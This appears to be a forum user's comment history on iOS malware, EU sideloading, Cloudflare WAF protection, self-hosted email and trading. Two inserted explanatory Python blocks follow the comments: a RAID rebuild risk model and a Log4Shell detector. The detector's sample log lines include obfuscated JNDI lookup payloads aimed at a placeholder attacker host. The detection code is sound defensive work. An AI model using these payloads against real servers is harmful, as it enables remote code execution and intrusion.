
Posts 4 · Comments 500 · Joined 2 yr. ago

  • Sure, but useless blog spam instead of linking directly to The Verge is a user problem, not a UI problem.

  • Lazy journalism. The two variants showcase exactly how iOS is more secure and how much harder it is to get on the device as well as attempt to extract info.

    A few quick points to answer questions outlined here:

    1. The Android and iOS variants behave differently. Due to security measures (as outlined in this post itself) the iOS variant cannot actually extract facial recognition data. Instead, it takes photos of the user with prompts about shifting their face and blinking etc. The setup here is because Thailand’s central bank requires banks to perform facial recognition to withdraw larger sums of money. By stealing your face in multiple photos, they could build a deep fake of your face to be used on another device later.
    2. Due to the way security works on iOS, the iOS variant cannot exfiltrate SMS messages directly. There is simply no permission to do so. Instead, it tricks users into installing an SMS filtering extension “to prevent fraudulent SMS” — this allows the attacker to read incoming SMS, but only from unknown numbers. The hope here is that they could intercept your MFA received via SMS at a later date.

    If anyone wants to do the full reading, it is available from Group-ib directly.

    And yes, this further cements my thoughts about the EU making a terrible move forcing Apple to enable side loading, as it adds additional vectors for bad actors to get into a currently much more secure and harder to invade device.

  • Let's park the specific geopolitical powers for a moment, because I cannot speak on behalf of countries and their intentions.

    People are inherently different, and have different mindsets and beliefs. You and I clearly don't fully agree on whether or not the iOS App Store should be opened up, for example; and while our lack of alignment is fairly benign, there will always be entities on different ends of our own individual biased points of view. Some of these are relatively minor (like the App Store), others are far more significant (like privacy concerns). There are plenty of world powers that would prefer to have access to more private information, and they are, as of today, without third party App Stores, having a much harder time doing so on the Apple iOS ecosystem. This is because in order to run anything, you'd have to get through Apple's stringent review process, and while there are plenty of terrible things we'd like to see gone from the App Store, they've got years of experience in heuristic detection, are generally fairly good about detecting malicious apps, and can revoke notarization when something does slip through.

    Now, a hypothetical world power with drastically different views than you or I (and we don't even have to agree with each other here) could start their own third party App Store, and bypass a lot of the checks and balances currently in place. "Don't install that app store, and don't install apps from it" is not an answer if they are in a position of power over you for whatever reason. I've called out a couple; maybe you need to pass through their country and their travel authorization at their airport is done via an app distributed only through their own app store; maybe you have family residing in such an area, and their only way to communicate with you is through a chat app from such an app store; etc. etc.

    That is the problem this opens up. And while government entities have a lot of surveillance capability, they're not having a lot of success with modern day end-to-end encryption, which is why there are continuous legislative attempts against encryption while hiding behind the guise of child protection / anti-terrorism / national security / etc. etc., and the demand is often to have government-known backdoors in the encryption -- I trust you're savvy enough to know how absurd that sounds that we don't need to go into detail here.

    Everything that's come to light so far seems to create a net negative experience for the vast majority of iOS users -- third party stores that peel away layers of security and losing the ability to use PWAs are just two casualties we've become aware of so far. The gong show will likely continue and we'll just have to wait to see what else comes to light as it further plays out.

  • It absolutely has happened on Android. The Russian government has launched their own app store, as an example of a state-owned-and-operated third party app store.

    Additionally, once both iOS and Android are opened up, the capability to control the end-to-end distribution on both platforms simultaneously becomes a much larger incentive for major corporations; gone are the days where some users receive some features earlier because the other app store has not pushed the update yet -- they control it end-to-end.

    I mean, I should be abundantly clear: simply operating a third party store does not equate to malicious intent. Some would argue the corporation case above could be considered beneficial for users. However, having third party stores with varying degrees of security capabilities increases attack vectors for bad actors, thereby making it more difficult for everyday users to manage -- an additional layer of complexity iOS users have not had to deal with for many years and very, very few have signed up for.

  • There are plenty of apps people are forced to install; apps used for international airport entries, apps that are used by everyone professionally, or worse yet, that one state-owned chat app grandma uses back home because everyone else uses it around her. All it takes is one of them deciding they don’t want to be part of the strict review process and that their ability to further spy on their users is worth the core technology fee, and now people would be forced to use third party app stores with questionable review processes. The “scare screen” before they add the third party App Store? That’s just going to be another thing users blindly click through due to notification fatigue.

    At least for the time being, under the current proposal put forth, Apple should still theoretically be able to revoke apps from third party app stores, and they still retain entitlement (sandbox/low level hardware access) signing rights. Once those checks and balances are taken away… then all hell breaks loose and those not super tech savvy (read: 99%+) will be hurt the most. At least I am comfortable enough to look out for myself 🤷

  • MFA or not, you can always social engineer people into giving access to their bank account. There are even SS7 attacks for SMS based MFA. So, let's just abolish passwords and MFA altogether and everyone hold hands to sing Kumbaya and be hippies together.... right? No, of course not. You do not weaken an established system because there are ways for bad actors to act maliciously. The vast majority of Apple users don't care for side loading and would benefit from the security that comes with the walled garden; very few Apple users (and the Lemmy user base does not represent a statistically significant, broad representation of the user base) know enough to care otherwise, but are now getting dragged along for the ride.

  • I think the current proposed implementation would still allow Apple to revoke apps from third party stores, and they'd still control entitlements internally. Having said that, there's plenty of pushback already, and I haven't caught up as to whether or not the EU has approved their proposal yet. In all cases, as I said earlier, just like the cookie law and GDPR, the DMA may have come from a good place with some good ideas, but the implementation is so broken, what companies will do to comply with the word of the law will be a gong show.

  • No. The law requires them to treat all browsers the same. If they allow it for Safari, they must implement the API for all. Given the absolutely abysmal user base that actually uses PWAs, it’s no surprise they deprioritized that feature and just deprecated it for all.

    Just like the cookie law and GDPR, the intention of DMA might be good but the implementation is going to create a gong show … and frankly I can’t wait for it to begin.

  • I honestly can’t wait for the gong show to begin.

    Just like the cookie law and GDPR before it, the intention might be good, but the implementation is so botched that it’s just going to be a huge mess.

    Hope a couple of emulators and porn apps will be worth it for those that advocated for this crap.

  • Didn’t they already do Mario 99 or whatever and then sunset it because it wasn’t successful like Tetris 99?

  • The biggest fear would be when you’re rebuilding, you’re putting extra stress on the other drives, thereby increasing the risk of them, too, dying.
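The comment above makes a qualitative point about rebuild risk. The following is an added worked model, not code from the commenter or from any storage vendor, that puts numbers on it. It treats the "extra stress" as a multiplier on the surviving drives' hourly failure rate, and, going a step beyond the comment, also includes the unrecoverable-read-error (URE) term, since a rebuild has to read every bit of the survivors. All figures (drive count, capacity, rebuild throughput, AFR, stress factor, URE rate) are constructed inputs, not measurements.

```python
import math

HOURS_PER_YEAR = 8766.0  # average year length in hours, leap years included


def rebuild_hours(capacity_tb: float, rebuild_mb_per_s: float) -> float:
    """Time to rebuild one failed drive when the replacement is written at a
    sustained rebuild_mb_per_s (constructed figure)."""
    return capacity_tb * 1e12 / (rebuild_mb_per_s * 1e6) / 3600.0


def hourly_hazard(afr: float, stress_factor: float = 1.0) -> float:
    """Constant per-hour failure rate implied by an annualised failure rate,
    scaled by stress_factor for the extra load a rebuild puts on the survivors.
    stress_factor is an assumption for illustration, not a measured value."""
    return -math.log(1.0 - afr) / HOURS_PER_YEAR * stress_factor


def p_any_survivor_fails(n_survivors: int, hours: float, afr: float,
                         stress_factor: float = 1.0) -> float:
    """Probability that at least one of n_survivors drives fails during a
    rebuild lasting `hours`, assuming independent exponential lifetimes."""
    return 1.0 - math.exp(-hourly_hazard(afr, stress_factor) * hours * n_survivors)


def p_unrecoverable_read_error(bytes_read: float, ure_per_bit: float = 1e-14) -> float:
    """Probability of at least one URE while the rebuild reads bytes_read from
    the surviving drives. 1e-14 per bit is a common datasheet figure; treat it
    as an input, not a fact about any particular drive."""
    bits = bytes_read * 8.0
    # 1 - (1 - p)**bits, written with log1p so it stays accurate for tiny p
    return 1.0 - math.exp(bits * math.log1p(-ure_per_bit))


def raid5_rebuild_risk(drives: int, capacity_tb: float, rebuild_mb_per_s: float,
                       afr: float, stress_factor: float = 1.0) -> dict:
    """Risk that a RAID5 rebuild fails after one drive has already died: either a
    second mechanical failure or a URE on a survivor loses the array."""
    survivors = drives - 1
    hours = rebuild_hours(capacity_tb, rebuild_mb_per_s)
    p_fail = p_any_survivor_fails(survivors, hours, afr, stress_factor)
    p_ure = p_unrecoverable_read_error(survivors * capacity_tb * 1e12)
    return {
        "rebuild_hours": hours,
        "p_second_drive_failure": p_fail,
        "p_unrecoverable_read_error": p_ure,
        "p_rebuild_fails": 1.0 - (1.0 - p_fail) * (1.0 - p_ure),
    }


if __name__ == "__main__":
    # Constructed scenario: 4 x 8 TB drives, rebuilding at 100 MB/s, 3% AFR
    for stress in (1.0, 2.0):
        r = raid5_rebuild_risk(4, 8, 100, 0.03, stress)
        print(f"stress x{stress}: {r['rebuild_hours']:.1f} h, "
              f"P(second failure)={r['p_second_drive_failure']:.4f}, "
              f"P(URE)={r['p_unrecoverable_read_error']:.3f}, "
              f"P(rebuild fails)={r['p_rebuild_fails']:.3f}")
```

Doubling the hazard during the rebuild roughly doubles the chance of a second mechanical failure, which is the commenter's concern; with large consumer drives, though, the URE term dominates the total, which is why the usual advice is RAID6/dual parity plus a verified backup rather than hoping the rebuild finishes.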

  • On the product offering page for Free DDoS Web Protection, the features table shows that "Unmetered DDoS Protection" is available for everyone regardless of tier from Free all the way up to Enterprise. This change was rolled out on 2017-09-25, prior to this, there was a certain amount of throughput depending on price point (though, still very generous for the free tier from what I remembered).

    Sometimes, people make up their mind about something and never update their knowledge, and it would appear this is one of those cases here.

  • No problem! I appreciate the civil discussion! Thank you!

  • The free tier rolled out was specifically to address upstream vendors patching Log4J too slowly. They’re able to monitor the requests and intercept malicious patterns before it hits the server running unpatched (due to upstream unavailable yet) applications. They are updating with more rules for the free tier set as far as they’ve stated. The extras from paid tiers are more extra rulesets and more analytics around what was blocked etc.

    At the end of the day though, you do you; the benefit for me may not be a benefit for you. I’m not selling their service, and have no benefit whatsoever should anyone opt into their services.

  • The difference in my opinion is that it doesn't matter how fast upstream vendors patch issues, there's a window between the issue being detected, the patch being implemented, the release getting pushed, notification of the release being received, and then finally the update getting deployed. Whereas at least on the cloud WAF front, they are able to look at requests across all sites, run analysis, and deploy instantly.

    There is a free tier with their basic "Free managed ruleset", which they deployed for everyone with orange cloud enabled when we saw the Log4J issue a couple of years back. This protection applies to all applications, not just the ones that were able to turn around quickly with a patch.

    If you want more bells and whistles, there's a fee associated with it, and I understand having fees is not for everyone, though the price point is much lower -- you get some more WAF features on the $25/mo ($20/mo amortized when paid annually) tier as well before having to fork out for the full $250/mo ($200/mo when paid annually) tier. There's a documentation page on all the price points and rulesets available.
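The comments above argue that a centrally managed ruleset can catch Log4J probes before every origin is patched. As an added example that is not the commenter's code and not Cloudflare's actual rules, the block below shows the detection problem such a ruleset has to solve: a literal `${jndi:` signature catches only the first-day payloads, while a rule that first collapses Log4j's nested lookup syntax (`${lower:j}`, `${::-j}`, `${env:X:-j}`) catches the obfuscated variants that appeared within hours. The access-log lines are constructed, and `attacker.example` is a placeholder host.

```python
import re
from typing import Iterable, List

# Constructed access-log lines (hypothetical, not from any real capture).
# The User-Agent field is a common place for Log4Shell probes to land.
SAMPLE_LINES = [
    '203.0.113.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:dns://attacker.example/c}"',
    '203.0.113.12 - - "GET /price?cur=${USD} HTTP/1.1" 200 "curl/8.0"',
]

# A lookup with no further ${...} nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the obfuscation is peeled away.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(inner: str):
    """Statically resolve one non-nested Log4j lookup to plain text.
    Returns None when it cannot (e.g. for the jndi: lookup itself), so the
    caller leaves that lookup in place for the final check."""
    if ":-" in inner:                       # ${anything:-default} -> default,
        return inner.split(":-", 1)[1]      # assuming the lookup is undefined
    prefix, sep, rest = inner.partition(":")
    if not sep:
        return None
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    return None


def normalize_lookups(s: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse innermost resolvable lookups until nothing changes.
    ${${lower:j}ndi:${lower:l}dap://h/a} becomes ${jndi:ldap://h/a}."""
    for _ in range(max_rounds):
        changed = False

        def collapse(m) -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        s = INNERMOST.sub(collapse, s)
        if not changed:
            break
    return s


def naive_match(line: str) -> bool:
    """The first-day signature many self-hosted rules shipped: a literal substring."""
    return "${jndi:" in line.lower()


def is_log4shell_probe(line: str) -> bool:
    """Normalise first, then match, so the obfuscated variants are caught too."""
    return bool(JNDI.search(normalize_lookups(line)))


def scan(lines: Iterable[str]) -> List[str]:
    """Return the request lines a normalising rule would block."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(f"naive={naive_match(line)!s:5} normalized={is_log4shell_probe(line)!s:5} {line}")
```

The literal rule flags one of the four probes; the normalising rule flags all four and leaves the benign `${USD}` query alone. A production WAF additionally URL- and Unicode-decodes the request and resolves more lookup prefixes (`sys:`, `date:`, `env:` with real values), and each new evasion that appears in live traffic is another rule revision, which is the "deploy instantly across all sites" advantage the comment describes.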

  • It’d be a challenge to keep up — 0-days aren’t going to be added to a self hosted solution faster than they could be detected and deployed on a massively leveraged system. Economy of scale on full display.

  • Security.

    Cloudflare handles a very large amount of traffic and sees many different types of attacks (think CSRF, injections, etc.). It is unlikely that you or I will be individually targeted, but drive-bys are a thing, and thanks to the amount of traffic they monitor, the WAF will more likely block out anything and patch before I’m able to update my apps on 0-days.

    Also, while the WAF is a paid feature, other free features, such as free DDoS attack protection, help prevent other attacks.

    It’s a trade off, sure; they’re technically MITM’ing your traffic, but frankly, I don’t care. Much like no one cares to target/attack me individually, they aren’t going to look at my content individually.

    Additionally, it also makes accessing things much easier. Also, it is much more likely I’d find an SME using Cloudflare than some janky custom self hosted tunnel setup. So from the point of view of using a homelab as learning for professional experience, it is much more applicable as well.

  • Thanks for the thought! In that case, I’ll wait and implement this on Sublinks later instead. Thanks.

  • Self hosting email on a non-mission critical domain for learning purposes might be okay if your intention is to get into the industry. Self hosting email for others in a more production-like setting, you’re going to find yourself in a world of pain.

    All it takes is one missed email (be it not making it into their intended recipient’s inbox, or them not receiving an important notice in their inbox) and you’re never going to hear the end of it.

    You’d also be liable for content your users send out from your servers — and I don’t mean the spam type, though if you get your IP blacklisted, your provider may want to have a word with you.

    I’d strongly advise against going down this path, but if you do, be sure to have ways to legally shield yourself from any sort of potential liabilities.

  • Only if their DMM enables options. There are many stocks without options. In that case, the only alternative would be to borrow shares from your broker and sell those shares instead. You’d then have an actual short position that could be recalled by the lender.

    Either way, I’d probably not touch it. I wouldn’t want the theta burn or the risk of getting recalled while price action tries to figure out a direction.